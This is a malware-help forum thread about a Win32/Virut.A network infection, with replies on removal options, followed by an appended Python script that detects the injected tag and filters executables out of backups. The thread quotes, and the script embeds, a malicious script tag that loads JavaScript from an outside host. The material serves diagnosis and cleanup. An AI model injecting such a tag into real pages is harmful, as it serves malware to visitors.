Win32/Virut.A Infection

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by RChicken, Mar 21, 2008.

  1. RChicken

    RChicken Private E-2

    Hello! I did do a search and read your read-mes to make sure that I won't bug you with a repeat, but after all that I am still having issues. On Wednesday our network got hit with Win32/Virut.A. What is happening is that it is inserting this code "<script src="http://u.asdafdgfgf.com/ads.js"></script>" into all my browser pages. I have run Spybot; it did not remove it. I also ran AVG Internet Security 8, and that didn't produce any results. I used the AVG Win32/Virut removal tool, and that didn't work. Normally after this I would just give up and format the computer, but this is where our bigger problem is.

    Someone on our network got this thing, which in turn spread it to every computer on our network, including our main data server. After looking through my Event Viewer I found what computer it came from and removed that computer from the network. Anyway, I am running a Win2k machine, but we have this virus on XP and Win2k3 Server machines. For starters I am trying to solve the issue on a Win2k machine, so here we go.

    I have attached the MGLogs.zip for you.
     


  2. Lev

    Lev MajorGeek

  3. RChicken

    RChicken Private E-2

    Here you go. After I ran the combo fixer and the super scanner I noticed I wasn't receiving the ads.js virus message; I also had JavaScript turned off in Firefox. But it needed the Java to attach the files, and as soon as I turned Java on I started getting the notice again.
     


  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    Infections like Virut.A which can infect all executable files can be just about impossible to reliably remove. According to Symantec:
    This comes from here: http://www.symantec.com/security_response/writeup.jsp?docid=2006-051402-1930-99&tabid=1

    None of the scans we are running are going to detect anything, since the virus infects valid files. Your only real possible chance of disinfection is by using an antivirus program that scans ALL files and that can repair the files that have been corrupted. If the AVG tool did not work, I'm not sure if any will. Did you run the tool in safe boot mode? Did you have it scan all drives?

    McAfee does imply that they fix it. See: http://vil.nai.com/vil/content/v_139473.htm

    I believe that many people wind up finding out that the only truly reliable fix for this infection is to delete partitions, re-partition and reinstall. Backing up any data must be done very carefully, since any executable-type file may be infected.

    After getting all PCs fixed, you must make sure that they are all properly updated with all security patches and that they are running proper protection. Cases of infections like Virut.A demonstrate why this is critical, especially in the business world.

    I see some other items we need to fix, but I don't believe they are related to Virut. We can try fixing these below, and I will give you a couple of other scans to run in the hopes that they can help with Virut, but I would not count on it.


    I don't like the looks of a driver/service I see in your logs. Can you put a copy of the below file into a ZIP file and attach it here for further analysis.
    C:\WINNT\system32\XDva032.sys

    Now we need to use ComboFix to remove a bunch of malware files.
    • Make sure that combofix.exe that you downloaded while doing the READ & RUN ME is on your Desktop but Do not run it!
      • If it is not on your Desktop, the below will not work.
    • Open Notepad and copy/paste the text in the below quote box into it:
    • Save the above as CFscript.txt and make sure you save it to the same location (should be on your Desktop) as ComboFix.exe
    • At this point, you MUST EXIT ALL BROWSERS NOW before continuing!
    • You should have both the ComboFix.exe and CFScript.txt icons on your Desktop.
    • Now use your mouse to drag CFscript.txt on top of ComboFix.exe
    • Follow the prompts.
    • When it finishes, a log will be produced named c:\combofix.txt
    • I will ask for this log below
    Note:

    Do not mouseclick combofix's window while it is running. That may cause it to stall.

    Now run Ccleaner!

    Now run the C:\MGtools\GetLogs.bat file by double clicking on it.

    Then attach the below logs:
    • C:\ComboFix.txt
    • C:\MGlogs.zip
    Make sure you tell me how things are working now!

    Now try giving the below tools a run and let me know if they find and remove anything:

    McAfee AVERT Stinger

    Kaspersky AVP Tool

    Trend Micro Housecall
     
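Two points in chaslang's reply above can be turned into a check an admin can run before rebuilding: the poster's own indicator (the injected `<script src="http://u.asdafdgfgf.com/ads.js"></script>` tag) and the warning that a data backup must leave behind every executable-type file because a file infector may have written into it. The script below is an added illustration and is not code from this thread, from AVG, McAfee or any other tool named here. It assumes the injected tag may also be present in web files on disk (an assumption; the poster only reports seeing it in browser pages), and it treats anything starting with the `MZ` DOS header as executable even when its extension looks like data. The sample directory it builds is constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Indicator from the thread: the script tag the poster saw injected into pages.
INJECTED_TAG = '<script src="http://u.asdafdgfgf.com/ads.js"></script>'
INJECTED_RE = re.compile(re.escape(INJECTED_TAG), re.IGNORECASE)

# Web content on disk that a tag could be written into (assumed, see lead-in).
WEB_EXTENSIONS = {".htm", ".html", ".php", ".asp", ".aspx"}

# Windows executable-type extensions (PE images and scripts) a file infector
# can carry; these are excluded from the data backup rather than copied.
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".scr", ".sys", ".ocx", ".cpl",
                         ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}


def is_pe_image(path):
    """True when the file starts with the 'MZ' DOS header, whatever its extension."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"MZ"
    except OSError:
        return False


def scan_web_files(root):
    """Return paths of web files under root that contain the injected script tag."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            if INJECTED_RE.search(text):
                hits.append(str(path))
    return sorted(hits)


def classify_for_backup(root):
    """Split a tree into files safe to copy as data and files to leave behind.

    A file is excluded if its extension is executable-type OR its content
    carries a PE header, so a renamed executable does not ride along as data.
    """
    keep, exclude = [], []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.suffix.lower() in EXECUTABLE_EXTENSIONS or is_pe_image(path):
            exclude.append(str(path))
        else:
            keep.append(str(path))
    return {"keep": sorted(keep), "exclude": sorted(exclude)}


def build_sample_tree():
    """Constructed sample tree (not from the thread): a clean page, an injected
    page, a real-looking executable, a document, and a PE image renamed as .txt."""
    root = Path(tempfile.mkdtemp(prefix="virut-demo-"))
    (root / "site").mkdir()
    (root / "site" / "index.html").write_text("<html><body>clean</body></html>")
    (root / "site" / "about.htm").write_text(
        "<html><body>hi</body></html>" + INJECTED_TAG)
    (root / "report.doc").write_bytes(b"\xd0\xcf\x11\xe0 fake document bytes")
    (root / "notes.txt").write_bytes(b"MZ this is a PE image renamed as text")
    (root / "setup.exe").write_bytes(b"MZ\x90\x00 fake executable")
    return str(root)


if __name__ == "__main__":
    sample = build_sample_tree()
    print("pages carrying the injected tag:", scan_web_files(sample))
    plan = classify_for_backup(sample)
    print("safe to back up as data:", plan["keep"])
    print("leave behind (executable-type):", plan["exclude"])
```

Run it against a share or a user profile before copying anything off an infected box; the "exclude" list is what must be reinstalled from clean media rather than restored, and any hit from `scan_web_files` is a file to replace from a known-good copy rather than to edit in place.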
